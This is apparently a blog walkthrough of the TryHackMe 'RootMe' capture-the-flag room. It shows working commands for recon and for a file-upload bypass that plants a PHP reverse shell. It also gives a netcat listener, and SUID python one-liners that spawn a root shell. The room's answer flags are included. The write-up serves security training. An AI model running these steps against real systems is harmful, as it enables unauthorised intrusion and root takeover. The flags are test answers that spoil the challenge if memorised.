3 minutes
THM_RootMe_Walkthrough
Simple Walkthrough for a TryHackMe Room
RootMe TryHackMe
performed by: jb-williams
Deploy the machine
Reconnaissance
- To get info on the target, run this
nmap
command:
nmap -v -T4 -sV -sC -oA nmap/initial 10.10.105.101
- This provides the answers to the following three questions.
Scan the machine, how many ports ar open?
- Answer:
2
What version of Apache is running?
- Answer:
2.4.29
What service is running on port 22?
- Answer:
ssh
Find directories on the web server using the GoBuster tool.
- To find directories you can use
gobuster
but I preferferoxbuster
. - Here are the respective commands I would run:
gobuster dir -u http://10.10.105.101 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobust.txt -t 15
- Since this(below) is my normal command, I also have it set to go through my webproxy so I can capture the requests/responses.
feroxbuster -w /urs/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.105.101/
What is the hidden direcotry?
- Answer:
/panel/
Getting a Shell
Find a form to upload and get a reverse shell, and find the flag.
- With the
feroxbuster
scan I found both/panel/
and/uploads/
- Traversing to
http://<IP>/panel/
, there seems to be a file upload page. - Tried uploading a reverse shell
.php
file from pentestmonkey. It would not allow that extension so I attempted several other PHP file exetensions. - After a few, I landed on being able to upload a
.phtml
file. - Then going to the previously mentioned
http://<IP>/uploads/
, You can see the previously uploaded files as a directory listing.
user.txt
- Setup a listener on the port you had provided in the revere shell which
nc
nc -lvnp 4444
- Then clicking on your
.phtml
reverse shell file in the/uploads/
will give you a reverse shell one that server. - They give us a prompt for the
user.txt
, if there is a file avail
cat $(find / -type f -iname user.txt 2> /dev/null)
-
If you
cat
that file you get the user flag -
Answer:
THM{y0u_g0t_a_sh3ll}
Privilege Escalation
Search for files with SUID permission, which file is weird?
- To find all
SUID
files, you can use this command:
find / -perm -4000 2>/dev/null
-
Looking through the output, sort of using my local machine as a references, this binary looks out of place.
-
Answer:
/usr/bin/python
Find a form to escalate your privileges.
- Knowing that we have access to the
SUID
/usr/bin/python
, the first thing I tend to do is check GTFOBins, to see if there are any options there. - After attempting the one listed. I actually couldn’t get it to work properly, so after looking at previous notes and trying different ways, I found these two commands each work depending on you shell preference.
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
or
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
root.txt
- After using that python command,
root
access was given, again they prompted us withroot.txt
, assuming it was in the/root
directory I just usedcat
on the absolute path. - You could also use this command if the file was not in the
/root
directory.
cat $(find / -type f -iname root.txt 2> /dev/null)
- Answer:
THM{pr1v1l3g3_3sc4l4t10n}
written and performed by jb-williams - github
linux pentest escalation SUID scanning python php gobuster feroxbuster file-upload tryhackme rootme walkthrough
509 Words
2023-04-15 10:41